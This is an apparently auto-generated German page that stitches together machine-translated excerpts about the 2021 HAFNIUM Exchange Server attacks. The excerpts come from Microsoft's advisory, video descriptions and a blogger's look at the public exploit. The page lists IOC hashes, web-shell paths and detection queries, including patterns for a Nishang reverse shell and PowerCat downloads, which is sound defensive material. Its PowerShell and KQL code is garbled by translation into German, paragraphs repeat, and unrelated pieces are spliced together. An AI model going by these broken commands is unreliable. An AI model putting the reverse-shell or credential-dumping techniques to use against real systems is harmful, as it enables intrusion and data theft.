Best exchange hafnium update Update

You are viewing this post: Best exchange hafnium update Update

Sie sehen gerade das Thema exchange hafnium update


HAFNIUM targeting Exchange Servers with 0-day exploits … New

02.03.2021 · Update [03/04/2021]: The Exchange Server team released a script for checking HAFNIUM indicators of compromise (IOCs). See Scan Exchange log files for indicators of compromise. Microsoft has detected multiple 0-day exploits being used to attack on-premises versions of Microsoft Exchange Server in limited and targeted attacks.

+ hier mehr lesen

Read more

Update [16.03.2021]: Microsoft hat aktualisierte Tools und Untersuchungsleitfäden veröffentlicht, um IT-Experten und Incident-Response-Teams dabei zu helfen, damit verbundene Angriffe zu identifizieren, zu beheben und sich gegen sie zu verteidigen: Anleitung für Responder: Untersuchung und Behebung von Schwachstellen in lokalen Exchange Servern.

Update [ 15.03.2021]: Microsoft hat ein neues Ein-Klick-Mitigationstool veröffentlicht, das Microsoft Exchange On-Premises Mitigation Tool, um Kunden zu helfen, die keine dedizierten Sicherheits- oder IT-Teams haben, um Sicherheitsupdates für Microsoft Exchange Server anzuwenden

Update [ 08.03.2021]: Microsoft sieht weiterhin, dass mehrere Akteure ungepatchte Systeme ausnutzen, um Organisationen mit lokalem Exchange Server anzugreifen

Um Verteidiger bei der Untersuchung dieser Angriffe zu unterstützen, bei denen Microsoft-Sicherheitsprodukte und -Tools möglicherweise nicht bereitgestellt werden, veröffentlichen wir einen Feed mit beobachteten Indikatoren für Kompromittierung (IOCs)

Der Feed von Malware-Hashes und bekannten bösartigen Dateipfaden, die bei ähnlichen Angriffen beobachtet wurden, ist sowohl im JSON- als auch im CSV-Format unter den folgenden GitHub-Links verfügbar

Diese Informationen werden im TLP:WHITE: CSV-Format geteilt | JSON-Format

Update [03.05.2021]: Microsoft sieht eine verstärkte Nutzung dieser Schwachstellen bei Angriffen auf ungepatchte Systeme durch mehrere böswillige Akteure jenseits von HAFNIUM

Um Kunden bei der Untersuchung dieser Angriffe zu unterstützen, hat das Microsoft Security Response Center (MSRC) zusätzliche Ressourcen bereitgestellt, einschließlich neuer Anleitungen zur Risikominderung: Microsoft Exchange Server Vulnerabilities Mitigations – March 2021

Update [03/04/2021]: Das Exchange Server-Team hat ein Skript veröffentlicht zur Überprüfung von HAFNIUM Indicators of Compromise (IOCs)

Siehe Exchange-Protokolldateien auf Kompromittierungsindikatoren scannen

Bei den beobachteten Angriffen nutzte der Bedrohungsakteur diese Schwachstellen, um auf lokale Exchange-Server zuzugreifen, die den Zugriff auf E-Mail-Konten ermöglichten, und ermöglichte die Installation zusätzlicher Malware, um den langfristigen Zugriff auf die Opferumgebungen zu erleichtern

Das Microsoft Threat Intelligence Center (MSTIC) schreibt diese Kampagne mit großem Vertrauen HAFNIUM zu, einer Gruppe, die aufgrund von beobachteter Viktimologie, Taktiken und Verfahren als staatlich gefördert und von China aus operierend eingestuft wird

Die kürzlich ausgenutzten Schwachstellen waren CVE-2021- 26855, CVE-2021-26857, CVE-2021-26858 und CVE-2021-27065, die alle in der heutigen Version des Microsoft Security Response Center (MSRC) behandelt wurden – Mehrere Sicherheitsupdates für Exchange Server veröffentlicht

Wir fordern Kunden dringend auf, lokale Systeme sofort zu aktualisieren

Exchange Online ist nicht betroffen

Wir haben ein Ressourcenzentrum eingerichtet, das ständig aktualisiert wird, sobald weitere Informationen unter https://aka.ms/ExchangeVulns verfügbar werden

Wir teilen diese Informationen mit unseren Kunden und der Sicherheitsgemeinschaft, um die kritische Natur dieser Sicherheitsanfälligkeiten und die Bedeutung hervorzuheben alle betroffenen Systeme sofort zu patchen, um sich vor diesen Exploits zu schützen und zukünftigen Missbrauch im gesamten Ökosystem zu verhindern

Dieser Blog setzt auch unsere Mission fort, böswillige Akteure zu beleuchten und das Bewusstsein für die ausgeklügelten Taktiken und Techniken zu schärfen, mit denen unsere Kunden angegriffen werden

Die verwandten IOCs, Azure Sentinel Advanced Hunting-Abfragen und Microsoft Defender for Endpoint-Produkterkennungen und -Abfragen, die in diesem Blog geteilt werden, helfen SOCs, proaktiv nach verwandten Aktivitäten in ihren Umgebungen zu suchen und alle Warnungen zur Behebung zu erhöhen

Microsoft möchte unseren Branchenkollegen danken bei Volexity und Dubex für die Meldung verschiedener Teile der Angriffskette und ihre Zusammenarbeit bei der Untersuchung

Volexity hat auch einen Blogbeitrag mit ihrer Analyse veröffentlicht

Es ist dieses Maß an proaktiver Kommunikation und Informationsaustausch, das es der Community ermöglicht, zusammenzukommen, um Angriffen zuvorzukommen, bevor sie sich ausbreiten, und die Sicherheit für alle zu verbessern

Wer ist HAFNIUM?

HAFNIUM richtet sich in erster Linie an Einrichtungen in den Vereinigten Staaten aus einer Reihe von Branchen, darunter Forscher für Infektionskrankheiten, Anwaltskanzleien, Hochschuleinrichtungen, Rüstungsunternehmen, politische Denkfabriken und NGOs

HAFNIUM hat zuvor Opfer durch die Ausnutzung von Schwachstellen im Internet kompromittiert Server und hat legitime Open-Source-Frameworks wie Covenant für Befehl und Kontrolle verwendet

Sobald sie sich Zugang zu einem Opfernetzwerk verschafft haben, exfiltriert HAFNIUM normalerweise Daten auf File-Sharing-Sites wie MEGA

In Kampagnen, die nichts mit diesen Schwachstellen zu tun haben, hat Microsoft beobachtet, dass HAFNIUM mit betroffenen Office 365-Mandanten interagiert

Obwohl es ihnen oft nicht gelingt, Kundenkonten zu kompromittieren, hilft diese Aufklärungsaktivität dem Angreifer, mehr Details über die Umgebung seiner Ziele zu identifizieren

HAFNIUM operiert hauptsächlich von gemieteten virtuellen privaten Servern (VPS) in den Vereinigten Staaten

Technische Details

Microsoft stellt die folgenden Details bereit, um unseren Kunden zu helfen, die Techniken zu verstehen, die von HAFNIUM verwendet werden, um diese Sicherheitsanfälligkeiten auszunutzen und eine effektivere Verteidigung gegen zukünftige Angriffe auf nicht gepatchte Systeme zu ermöglichen in Exchange, die es dem Angreifer ermöglichte, beliebige HTTP-Anforderungen zu senden und sich als Exchange-Server zu authentifizieren

Bei der unsicheren Deserialisierung werden nicht vertrauenswürdige, vom Benutzer kontrollierbare Daten von einem Programm deserialisiert

Das Ausnutzen dieser Schwachstelle gab HAFNIUM die Möglichkeit, Code als SYSTEM auf dem Exchange-Server auszuführen

Dies erfordert eine Administratorberechtigung oder eine andere Sicherheitsanfälligkeit, die ausgenutzt werden kann

Wenn sich HAFNIUM beim Exchange-Server authentifizieren könnte, könnten sie diese Schwachstelle nutzen, um eine Datei in einen beliebigen Pfad auf dem Server zu schreiben

Sie könnten sich authentifizieren, indem sie die SSRF-Schwachstelle CVE-2021-26855 ausnutzen oder die Anmeldeinformationen eines legitimen Administrators kompromittieren

Wenn sich HAFNIUM beim Exchange-Server authentifizieren könnte, könnten sie diese Schwachstelle nutzen, um eine Datei in einen beliebigen Pfad auf dem Server zu schreiben

Sie könnten sich authentifizieren, indem sie die SSRF-Schwachstelle CVE-2021-26855 ausnutzen oder die Anmeldeinformationen eines legitimen Administrators kompromittieren

Angriffsdetails

Nachdem sie diese Sicherheitslücken ausgenutzt hatten, um sich ersten Zugriff zu verschaffen, setzten die HAFNIUM-Betreiber Web-Shells auf dem kompromittierten Server ein

Web-Shells ermöglichen es Angreifern möglicherweise, Daten zu stehlen und zusätzliche böswillige Aktionen auszuführen, die zu weiteren Kompromittierungen führen

Ein Beispiel für eine von HAFNIUM bereitgestellte Web-Shell, geschrieben in ASP, ist unten:

Nach der Bereitstellung der Web-Shell führten die HAFNIUM-Betreiber die folgenden Aktivitäten nach der Ausbeutung durch:

Verwenden von Procdump zum Sichern des LSASS-Prozessspeichers:

Verwenden von 7-Zip zum Komprimieren gestohlener Daten in ZIP-Dateien für die Exfiltration:

Hinzufügen und Verwenden von Exchange PowerShell-Snap-Ins zum Exportieren von Postfachdaten:

Verwenden der Reverse-Shell Nishang Invoke-PowerShellTcpOneLine:

Laden Sie PowerCat von GitHub herunter und öffnen Sie damit eine Verbindung zu einem Remote-Server:

HAFNIUM-Betreiber konnten auch das Exchange-Offline-Adressbuch von kompromittierten Systemen herunterladen, das Informationen über eine Organisation und ihre Benutzer enthält

Unser Blog „Defending Exchange server under attack“ bietet Ratschläge zur Verbesserung der Verteidigung gegen die Kompromittierung von Exchange-Servern

Kunden finden auch zusätzliche Anleitungen zu Web-Shell-Angriffen in unserem Blog Web-Shell-Angriffe nehmen weiter zu

Kann ich feststellen, ob ich durch diese Aktivität kompromittiert wurde?

Die folgenden Abschnitte enthalten Indikatoren für Kompromittierung (IOCs), Erkennungsanleitungen und erweiterte Suchabfragen, um Kunden bei der Untersuchung dieser Aktivität mithilfe von Exchange-Serverprotokollen, Azure Sentinel, Microsoft Defender für Endpoint und Microsoft 365 Defender zu unterstützen

Wir ermutigen unsere Kunden, Untersuchungen durchzuführen und proaktive Erkennungen zu implementieren, um mögliche frühere Kampagnen zu identifizieren und zukünftige Kampagnen zu verhindern, die auf ihre Systeme abzielen könnten

Überprüfen Sie die Patch-Level von Exchange Server

Das Microsoft Exchange Server-Team hat einen Blogbeitrag zu diesen neuen Sicherheitsupdates veröffentlicht, der ein Skript bereitstellt, um eine schnelle Bestandsaufnahme des Patch-Level-Status von lokalen Exchange-Servern zu erhalten und einige grundlegende Fragen zur Installation dieser Patches zu beantworten

Exchange-Protokoll scannen Dateien für Kompromittierungsindikatoren

Das Exchange Server-Team hat ein Skript erstellt, um eine Prüfung auf HAFNIUM-IOCs auszuführen, um Leistungs- und Speicherprobleme zu beheben

Dieses Skript ist hier verfügbar: https://github.com/microsoft/CSS-Exchange/tree/main/Security.

Die Ausnutzung von CVE-2021-26855 kann über die folgenden Exchange HttpProxy-Protokolle erkannt werden: Diese Protokolle befinden sich im Folgenden Verzeichnis: %PROGRAMFILES%\Microsoft\Exchange Server\V15\Logging\HttpProxy Exploitation kann identifiziert werden, indem nach Protokolleinträgen gesucht wird, bei denen AuthenticatedUser leer ist und AnchorMailbox das Muster ServerInfo~*/* enthält

Hier ist ein zu findender PowerShell-Beispielbefehl diese Logeinträge:

Import-Csv -Path (Get-ChildItem -Recurse -Path “$env:PROGRAMFILES\Microsoft\Exchange Server\V15\Logging\HttpProxy” -Filter ‘*.log’).FullName | Where-Object { $_.AnchorMailbox -like ‘ServerInfo~*/*’ -or $_.BackEndCookie -like ‘Server~*/*~*’} | Wählen Sie DateTime, AnchorMailbox, UrlStem, RoutingHint, ErrorCode, TargetServerVersion, BackEndCookie, GenericInfo, GenericErrors, UrlHost, Protocol, Method, RoutingType, AuthenticationType, ServerHostName, HttpStatus, BackEndStatus, UserAgent aus

Wenn Aktivität erkannt wird, können die für die im AnchorMailbox-Pfad angegebenen Anwendungsprotokolle verwendet werden, um festzustellen, welche Aktionen durchgeführt wurden

Diese Protokolle befinden sich im Verzeichnis %PROGRAMFILES%\Microsoft\Exchange Server\V15\Logging

Die Ausnutzung von CVE-2021-26858 kann über die Exchange-Protokolldateien erkannt werden: C:\Program Files\Microsoft\Exchange Server\V15\Logging \OABGeneratorLog Dateien sollten nur in %PROGRAMFILES%\Microsoft\Exchange Server\V15\ClientAccess heruntergeladen werden \OAB\Temp-Verzeichnis Im Falle einer Ausnutzung werden Dateien in andere Verzeichnisse (UNC oder lokale Pfade) heruntergeladen

Windows-Befehl zur Suche nach potenzieller Ausnutzung :

findstr /snip /c:”Download fehlgeschlagen und temporäre Datei” “%PROGRAMFILES%\Microsoft\Exchange Server\V15\Logging\OABGeneratorLog\*.log”

Die Ausnutzung von CVE-2021-26857 kann über die Windows-Anwendungsereignisprotokolle erkannt werden

Durch die Ausnutzung dieses Deserialisierungsfehlers werden Anwendungsereignisse mit den folgenden Eigenschaften erstellt: Quelle: MSExchange Unified Messaging EntryType: Error Event Message Contains: System.InvalidCastException Es folgt ein abzufragender PowerShell-Befehl das Anwendungsereignisprotokoll für diese Protokolleinträge:

Get-EventLog -LogName Application -Source “MSExchange Unified Messaging” -EntryType Error | Where-Object { $_.Message -like “*System.InvalidCastException*” }

Die Ausnutzung von CVE-2021-27065 kann über die folgenden Exchange-Protokolldateien erkannt werden: C:\Program Files\Microsoft\Exchange Server\V15\Logging\ECP\Server

Alle Set-VirtualDirectory-Eigenschaften sollten niemals Skript enthalten

InternalUrl und ExternalUrl sollten nur gültige Uris sein

Im Folgenden finden Sie einen PowerShell-Befehl zum Suchen nach potenzieller Ausnutzung:

Select-String -Path “$env:PROGRAMFILES\Microsoft\Exchange Server\V15\Logging\ECP\Server\*.log” -Pattern ‘Set-.+VirtualDirectory’

Host-IOCs

Microsoft veröffentlicht einen Feed mit beobachteten Kompromittierungsindikatoren (IOCs) bei verwandten Angriffen

Dieser Feed ist sowohl im CSV- als auch im JSON-Format verfügbar

Diese Informationen werden als TLP:WHITE.

Hashes geteilt

Web-Shell-Hashes

b75f163ca9b9240bf4b37ad92bc7556b40a17e27c2b8ed5c8991385fe07d17d0

097549cf7d0f76f0d99edf8b2d91c60977fd6a96e4b8c3c94b0b1733dc026d3e

2b6f1ebb2208e93ade4a6424555d6a8341fd6d9f60c25e44afe11008f5c1aad1

65149e036fff06026d80ac9ad4d156332822dc93142cf1a122b1841ec8de34b5

511df0e2df9bfa5521b588cc4bb5f8c5a321801b803394ebc493db1ef3c78fa1

4edc7770464a14f54d17f36dc9d0fe854f68b346b27b35a6f5839adf1f13f8ea

811157f9c7003ba8d17b45eb3cf09bef2cecd2701cedb675274949296a6a183d

1631a90eb5395c4e19c7dbcbf611bbe6444ff312eb7937e286e4637cb9e72944

Pfade

Wir haben Web-Shells in den folgenden Pfaden beobachtet:

C:\inetpub\wwwroot\aspnet_client\

C:\inetpub\wwwroot\aspnet_client\system_web\

In Microsoft Exchange Server Installationspfade wie: %PROGRAMFILES%\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth\ C:\Exchange\FrontEnd\HttpProxy\owa\auth\

Die von uns erkannten Web-Shells hatten die folgenden Dateinamen:

web.aspx

help.aspx

document.aspx

errorEE.aspx

errorEEE.aspx

errorEW.aspx

errorFF.aspx

healthcheck.aspx

aspnet_www.aspx

aspnet_client.aspx

xx.aspx

Shell.aspx

aspnet_iisstart.aspx

one.aspx

Suchen Sie in C:\ProgramData\ nach verdächtigen. zip-,. rar- und. 7z-Dateien, die auf eine mögliche Datenexfiltration hinweisen können

Kunden sollten diese Pfade auf LSASS-Dumps überwachen:

C:\windows\temp\

C:\root\

Werkzeuge

Viele der folgenden Erkennungen beziehen sich auf Post-Breach-Techniken, die von HAFNIUM verwendet werden

Während diese helfen, einige der spezifischen aktuellen Angriffe zu erkennen, die Microsoft beobachtet hat, bleibt es sehr wichtig, die kürzlich veröffentlichten Updates für CVE-2021-26855, CVE-2021-26857, CVE-2021-27065 und CVE-2021-26858 anzuwenden

.Microsoft Defender Antivirus-Erkennungen

Bitte beachten Sie, dass einige dieser Erkennungen generische Erkennungen sind und nicht nur für diese Kampagne oder diese Exploits gelten

Exploit:Script/Exmann.A!dha

Verhalten:Win32/Exmann.A

Hintertür: ASP/SecChecker.A

Backdoor:JS/Webshell (nicht eindeutig)

Trojan:JS/Chopper!dha (nicht eindeutig)

Verhalten:Win32/DumpLsass.A!attk (nicht eindeutig)

Backdoor:HTML/TwoFaceVar.B (nicht eindeutig)

Microsoft Defender für Endpoint-Erkennungen

Verdächtige Erstellung eines Exchange UM-Prozesses

Verdächtige Erstellung einer Exchange UM-Datei

Mögliche Web-Shell-Installation (nicht eindeutig)

Speicherauszug verarbeiten (nicht eindeutig)

Azure Sentinel-Erkennungen

Erweiterte Jagdabfragen

Um mögliche Ausnutzungsaktivitäten im Zusammenhang mit den Inhalten dieses Blogs zu lokalisieren, können Sie die folgenden erweiterten Suchabfragen über Microsoft Defender für Endpoint und Azure Sentinel ausführen:

Microsoft Defender für erweiterte Jagdabfragen für Endpoint

Microsoft 365 Defender-Kunden finden verwandte Jagdabfragen unten oder an diesem GitHub-Standort: https://github.com/microsoft/Microsoft-365-Defender-Hunting-Queries/

Zusätzliche Abfragen und Informationen sind über das Threat Analytics-Portal für Microsoft Defender-Kunden verfügbar

UMWorkerProcess.exe in Exchange erstellt abnormale Inhalte

Suchen Sie nach dem Unified Messaging-Dienst von Microsoft Exchange Server, der nicht standardmäßige Inhalte auf der Festplatte erstellt, die auf Web-Shells oder andere schädliche Inhalte hinweisen könnten, was auf die Ausnutzung der Schwachstelle CVE-2021-26858 hindeutet:

DeviceFileEvents | wo InitiatingProcessFileName == “UMWorkerProcess.exe” | wobei Dateiname != “CacheCleanup.bin” | wobei Dateiname !auf “.txt” endet | wobei Dateiname !auf “.LOG” endet | wobei Dateiname !auf “.cfg” endet | wobei Dateiname != “cleanup.bin”

UMWorkerProcess.exe-Spawning

Suchen Sie nach dem Unified Messaging-Dienst von Microsoft Exchange Server, der anormale Unterprozesse hervorbringt, was auf die Ausnutzung der Schwachstelle CVE-2021-26857 hindeutet:

DeviceProcessEvents | wo InitiatingProcessFileName == “UMWorkerProcess.exe” | wobei Dateiname != “wermgr.exe” | wobei Dateiname != “WerFault.exe”

Bitte beachten Sie, dass übermäßiges Spawnen von „wermgr.exe“ und „WerFault.exe“ ein Indikator für eine Kompromittierung sein kann, da der Dienst während der Deserialisierung abstürzt

Azure Sentinel-Kunden finden eine Sentinel-Abfrage mit diesen Indikatoren im Azure Sentinel-Portal oder an diesem GitHub-Standort: https://github.com/Azure/Azure-Sentinel/tree/master/Detections/MultipleDataSources/.

Suchen Sie nach Nishang Invoke -PowerShellTcpOneLine in der Windows-Ereignisprotokollierung:

Sicherheitsereignis | wo EventID == 4688 | wo Process has_any (“powershell.exe”, “PowerShell_ISE.exe”) | wobei CommandLine “$client = New-Object System.Net.Sockets.TCPClient” hat

Suchen Sie nach Downloads von PowerCat in cmd und Powershell-Befehlszeilenprotokollierung in Windows-Ereignisprotokollen:

Sicherheitsereignis | wo EventID == 4688 | wo Process has_any (“cmd.exe”, “powershell.exe”, “PowerShell_ISE.exe”) | wo CommandLine “https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1” hat

Suchen Sie nach dem geladenen Exchange PowerShell-Snap-In

Dies kann zum Exportieren von Postfachdaten verwendet werden, nachfolgende Befehlszeilen sollten überprüft werden, um die Verwendung zu überprüfen:

HAFNIUM – Post-Exploitation Analysis from Microsoft Exchange Update

Video ansehen

Weitere Informationen zum Thema exchange hafnium update

If you would like to support the channel and I, check out Kite! Kite is a coding assistant that helps you code faster, on any IDE offer smart completions and documentation. https://www.kite.com/get-kite/?utm_medium=referral\u0026utm_source=youtube\u0026utm_campaign=johnhammond\u0026utm_content=description-only (disclaimer, affiliate link)
For more content, subscribe on Twitch! https://twitch.tv/johnhammond010
If you would like to support me, please like, comment \u0026 subscribe, and check me out on Patreon: https://patreon.com/johnhammond010
PayPal: https://paypal.me/johnhammond010
E-mail: [email protected]
Discord: https://johnhammond.org/discord
Twitter: https://twitter.com/_johnhammond
GitHub: https://github.com/JohnHammond

exchange hafnium update Einige Bilder im Thema

 Update  HAFNIUM - Post-Exploitation Analysis from Microsoft Exchange
HAFNIUM – Post-Exploitation Analysis from Microsoft Exchange Update

HAFNIUM Exploit: Microsoft veröffentlicht Updates für … Aktualisiert

09.03.2021 · Aufgrund der Schwere des HAFNIUM Exploits hat Microsoft weitere Updates für ältere Exchange Server Versionen veröffentlicht. Die Updates können allerdings nicht via Windows Update bezogen werden, sondern müssen runtergeladen und manuell installiert werden. Weitere Informationen zu den Updates finden sich hier:

+ Details hier sehen

Read more

Aufgrund der Schwere des HAFNIUM-Exploits hat Microsoft zusätzliche Updates für ältere Exchange Server-Versionen veröffentlicht

Allerdings können die Updates nicht über Windows Update bezogen werden, sondern müssen manuell heruntergeladen und installiert werden

Weitere Informationen zu den Updates finden Sie hier:

Einige haben angenommen, dass ältere Exchange-Versionen nicht für die HAFNIUM-Exploits anfällig sind, aber das ist nicht richtig

Allerdings unterstützt Microsoft immer nur 2 Versionen von Exchange CUs: Konkret bedeutet das, dass nur das aktuelle und das vorherige CU unterstützt werden, weshalb es beispielsweise nur Updates für CU 18 und CU 19 für Exchange 2016 gibt

Da aber auch ältere Versionen anfällig sind, hat Microsoft jetzt Updates für ältere Exchange-Versionen freigegeben: Quelle: https://techcommunity.microsoft.com/t5/exchange-team-blog/march-2021-exchange-server-security-updates-for-older-cumulative/ba-p/2192020

Allerdings sind noch keine Updates für andere Exchange-Versionen verfügbar

Am besten wäre es daher, schnellstmöglich das aktuelle CU zu installieren und direkt im Anschluss die Sicherheitsupdates HAFNIUM-Exploit

Da einige Tage vergangen sind, sollten die Server dann akribisch auf einen Angriff überprüft werden

Die neu bereitgestellten Updates finden Sie hier:

https://support.microsoft.com/en-us/topic/description-of-the-security-update-for-microsoft-exchange-server-2019-2016-and-2013-march-2-2021-kb5000871- 9800a6bb-0a21-4ee7-b9da-fa85b3e1d23b

Unter dem Artikel zum Originalartikel gibt es viele wertvolle Informationen von Admins die betroffen waren/sind und bereits Gegenmaßnahmen ergriffen haben:

Wenn Sie auch betroffen sind, dann schauen Sie sich den Artikel nur Neuinstallation an, manchmal ist eine Neuinstallation schneller als eine Wiederherstellung:

Analyzing The Microsoft Exchange Server Hafnium Email Hack and How to Patch Update

Video unten ansehen

Neues Update zum Thema exchange hafnium update

In this video walkthrough, we went over the recent Microsoft exchange vulnerability namely CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, and CVE-2021-27065 or the Hafnium Zero Day, and demonstrated how to test and patch them.

The summary with supporting material can be found in this link
https://motasem-notes.net/how-to-test-if-your-exchange-server-is-compromised-and-vulnerable/
—-
Receive video documentation
https://www.youtube.com/channel/UCNSdU_1ehXtGclimTVckHmQ/join
—-
Do you need private cybersecurity training? sign up here
https://motasem-notes.net/cybersecurity-consultation/

Twitter
https://twitter.com/ManMotasem
LinkedIn
https://www.linkedin.com/in/motasem-hamdan-7673289b/
Instagram
https://www.instagram.com/mo.vultu/
Facebook
https://www.facebook.com/motasemhamdantty

exchange hafnium update Ähnliche Bilder im Thema

 Update  Analyzing The Microsoft Exchange Server Hafnium Email Hack and How to Patch
Analyzing The Microsoft Exchange Server Hafnium Email Hack and How to Patch New

HAFNIUM: Kleines Update zum öffentlichen … – Frankys Web Update

12.03.2021 · HAFNIUM: Kleines Update zum öffentlichen Exploit 12. März 2021 von Frank Zöchling Mittlerweile ist der Exploit für die Exchange Schwachstellen öffentlich verfügbar und zieht, wie zu erwarten war, noch weitere Kreise.

+ mehr hier sehen

Read more

Der Exploit für die Exchange-Schwachstellen ist nun öffentlich zugänglich und breitet sich erwartungsgemäß weiter aus

Zunächst wurde der Exploit auf GitHub geblockt, was natürlich dazu führte, dass der Exploit nun auf den unterschiedlichsten Seiten veröffentlicht wurde

Der Exploit ist jetzt wieder auf GitHub verfügbar, nur auf anderen Konten (oder über einen Tor-Link)

Wenn jemand einen Blick darauf werfen möchte, kann der Exploit hier gefunden werden:

Übrigens erkennt Windows Defender den Exploit-Code mit den aktuellen Signaturen, was natürlich nicht viel hilft, da der Exploit remote ausgeführt wird:

Ich habe mir den Exploit angesehen, es sind nur 169 Zeilen Python-Code

Eine kleine aber feine Schwachstelle ist mir gleich aufgefallen: Wer also seinen Exchange Server nicht unter dem Standardpfad „C:\Programme\Microsoft\Exchange Server“ installiert hat, sondern beispielsweise auf einem anderen Laufwerk, kann sitzen zurück und klopfen Sie sich auf die Schulter: Gut gemacht! Zumindest würde dieser Exploit versuchen, die Webshell in einem Verzeichnis zu erstellen, das nicht existiert, wenn Exchange auf einem anderen Laufwerk oder Pfad installiert wurde

Dies gilt jedoch nur für diesen PoC-Exploit-Code und wird höchstens jemanden stoppen, der versucht, dieses Beispiel direkt zu kopieren

Dieser Exploit kann ohne weitere Anpassung nicht direkt ausgeführt werden

Ich habe den Exploit mit Exchange 2019 getestet und er blieb an mehreren Stellen hängen

Bis zu einem gewissen Punkt ist das alles noch recht einfach anzupassen, aber zumindest in meiner Exchange 2019 Testumgebung wird die „msExchCanary“ nach dem ProxyLogon nicht zurückgegeben:

Das könnte übrigens eine Erklärung für die vielen Proxy-Anmeldungen sein, die in den IIS-Logs stattfanden, wo allerdings keine Webshell oder ähnliches zu finden ist

Andere Exchange-Versionen konnte ich noch nicht testen

Offenbar haben zumindest nicht alle Angreifer den Exploit gut genug adaptiert

Das heißt aber nicht, dass es nicht gelingen wird, denn aktuell wird über die bekannten Schwachstellen Ransomware installiert, die Daten im Netzwerk verschlüsselt

Neben einer Web-Shell ist dies das zweite Worst-Case-Szenario für Unternehmen

Ich empfehle daher dringend, ungepatchte Exchange-Server direkt vom Internet zu trennen (Port 443 auf der Firewall sperren) und die Server schnellstmöglich zu aktualisieren

Dies wirkt sich nicht auf den Mailempfang aus, nur Benutzer, die ActiveSync, OWA und/oder OutlookAnywhere (RPCoverHTTPs, MAPIoverHTTPs) verwenden, können nicht mehr auf Exchange zugreifen

Hier könnte der Zugriff aber über VPN erfolgen, wenn dies unbedingt erforderlich ist

Ich kann mir gut vorstellen, dass gerade kleinere Systemhäuser vor einer riesigen Aufgabe stehen, die Systeme der Kunden schnellstmöglich zu aktualisieren, dies aber aufgrund der Ressourcen und des Aufwands einfach nicht so schnell erledigen können, wie es nötig wäre

Daher meine Empfehlung: Erst alle vom Netz trennen, dann updaten, dann prüfen und ggf

neu installieren und erst dann den Zugriff über Port 443 wieder freigeben

Laut BSI waren gestern rund 25.000 Exchange-Server in Deutschland angreifbar:

Bevor also die nächste Ransomware-Plage oder hier vertrauliche Daten öffentlich werden, sollten diese Systeme schnellstmöglich offline genommen und aktualisiert werden

Zu prüfen ist auch, ob eine Meldepflicht im Sinne der DSGVO besteht

Weitere Informationen finden Sie hier: https://www.heise.de/news/Exchange-Hack-Uneinheitliche-Position-der-Datenschutzbehoerden-zur-Meldepflicht-5078453.html

Meine Empfehlung, wenn Anzeichen bei den verfügbaren Testskripten auftauchen und die Updates damals noch nicht installiert waren, dann lieber neu installieren:

https://www.frankysweb.de/exchange-server-neuinstallation-ohne-datenverlust-beispiel-nach-angriff/

Hafnium and what to do about the latest Microsoft Exchange vulnerabilities Update

Video ansehen

Neue Informationen zum Thema exchange hafnium update

In this ‘Splainer, we dig into the the four new critical vulnerabilities in windows exchange server and what you should do about it.

exchange hafnium update Einige Bilder im Thema

 New  Hafnium and what to do about the latest Microsoft Exchange vulnerabilities
Hafnium and what to do about the latest Microsoft Exchange vulnerabilities Update New

Hafnium: Sicherheitsupdates jetzt installieren | … Neueste

Updating

+ Details hier sehen

Read more

Hafnium: Sicherheitsupdate für Microsoft Exchange zum Schutz vor neuen nationalstaatlichen Angriffen Immersive Reader verfügbar

Heute teilen wir zum ersten Mal Informationen über einen neuen, von der Regierung unterstützten Bedrohungsakteur, der vom Microsoft Threat Intelligence Center (MSTIC) identifiziert wurde und den wir Hafnium nennen

Hafnium, das von China aus operiert, ist ein sehr raffinierter und anspruchsvoller Spieler

In der Vergangenheit hat sich Hafnium hauptsächlich an Organisationen in den USA gewandt, um Informationen aus verschiedenen Branchen zu sammeln, darunter Forschungsinstitute für Infektionskrankheiten, Anwaltskanzleien, Hochschulen, Verteidigungsunternehmen, politische Denkfabriken und Nichtregierungsorganisationen (NGOs)

Obwohl Hafnium seinen Sitz in China hat, führt es seinen Betrieb hauptsächlich von gemieteten Virtual Private Servers (VPS) in den Vereinigten Staaten aus

Vor kurzem hat Hafnium eine Reihe von Angriffen mit bisher unbekannten Exploits gestartet, die auf lokale Exchange Server-Software abzielen

Bisher ist Hafnium der Hauptakteur, der diese Exploits verwendet

Ausführliche Informationen dazu hat das MSTIC hier bereitgestellt

Die Angriffe umfassen drei Schritte:

Hafnium verschafft sich Zugriff auf einen Exchange-Server, entweder mit gestohlenen Passwörtern oder indem es zuvor unentdeckte Schwachstellen ausnutzt, um sich als jemand auszugeben, der Zugriff haben sollte

Organisationen können sich schützen, indem sie vertrauenswürdige Verbindungen einschränken oder ein VPN einrichten, um Exchange Server vor externem Zugriff zu isolieren

Diese Maßnahmen können jedoch nur vor dem ersten Schritt eines Hafniumangriffs schützen

Die weiteren Angriffsschritte können ausgelöst werden, wenn ein Angreifer bereits Zugriff hat oder einen Administrator dazu verleiten kann, eine schädliche Datei auszuführen

Dann erstellt Hafnium eine sogenannte Web-Shell, um den kompromittierten Server fernzusteuern

Hafnium nutzt den Fernzugriff, der von seinen privaten Servern in den USA ausgeführt wird, um Daten aus dem Netzwerk einer Organisation zu stehlen

Um unsere Kunden vor Hafnium-Angriffen zu schützen, konzentrieren wir uns auf die Exploits, die sie ermöglichen

Zu diesem Zweck haben wir Sicherheitsupdates veröffentlicht, um unsere Kunden zu schützen, die Exchange Server verwenden

Wir wissen, dass nationalstaatliche Akteure und kriminelle Gruppen ungepatchte Systeme sehr schnell ausnutzen

Die sofortige Installation der heutigen Patches ist die beste Verteidigung gegen diesen Angriff

Wir raten daher allen Exchange Server-Kunden, diese Updates umgehend zu installieren

Exchange Server wird hauptsächlich von Geschäftskunden genutzt

Wir haben derzeit keine Hinweise darauf, dass die Angriffe von Hafnium auf einzelne Verbraucher abzielen oder dass sie andere Microsoft-Produkte betreffen

Zusätzlich zu diesen neuen Schutzmaßnahmen für unsere Kunden haben wir auch die zuständigen US-Regierungsbehörden über die Aktivitäten von Hafnium informiert

Dies ist das achte Mal in den letzten 12 Monaten, dass Microsoft Angriffe nationalstaatlicher Hackergruppen auf zivilgesellschaftliche Institutionen aufgedeckt hat

Dazu gehörten Angriffe auf Gesundheitsorganisationen, die gegen Covid-19 kämpfen, auf politische Kampagnen im Zusammenhang mit den Wahlen 2020 und auf hochkarätige Teilnehmer an wichtigen politischen Konferenzen.

Wir freuen uns sehr, dass viele Organisationen ihre sicherheitsrelevanten Daten freiwillig teilen – untereinander und mit staatlichen Institutionen, die sich für den Schutz vor Cyber-Bedrohungen einsetzen

